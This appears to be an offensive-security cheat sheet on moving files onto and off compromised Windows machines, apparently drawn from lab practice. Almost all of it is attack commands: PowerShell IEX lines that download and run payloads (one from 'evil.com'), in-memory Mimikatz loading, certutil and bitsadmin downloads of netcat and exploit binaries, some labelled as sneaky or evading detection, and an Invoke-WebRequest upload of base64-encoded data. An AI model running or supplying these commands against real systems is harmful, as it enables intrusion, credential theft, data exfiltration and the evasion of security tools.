File Transfer

curl

curl http://ip/file -o <output>

wget

wget http://ip/file -OutFile <output>

Fileless Execution

Invoke-Expression to download and execute

powershell.exe -c "IEX(New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"

In-memory execution

Mimikatz

IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1')

certutil

First, start a python web server

python3 -m http.server 443

Then

certutil.exe -f -urlcache -split http://<IP>/<file>

You can specify the location and rename the file

certutil -urlcache -split -f http://10.10.14.23:8000/ms15-051.exe C:\inetpub\drupal-7.54\ms15-051.exe

Sneaky Version

certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe

Invoke-WebRequest

Then

IWR -uri http://<ip>/<file> -OutFile <file_name>

Uses Chrome User Agent

Invoke-WebRequest http://nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "nc.exe"

Upload a file

Invoke-WebRequest -Uri http://10.10.10.32:443 -Method POST -Body $b64

Impacket

First, create a SMB share folder

impacket-smbserver <share_name> <file_path> -smb2support

Then, copy the files

copy \\<ip>\share\<file> <destination_path>

System.Net.WebClient

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://ip/file', '<output>')

Bitsadmin

Download files stealthily and evade detection, as bitsadmin is a native tool and might be overlooked by some security solutions.

bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe

Modern Version

Start-BitsTransfer -Source http://10.10.10.32/nc.exe -Destination C:\Temp\nc.exe

Last updated 22 days ago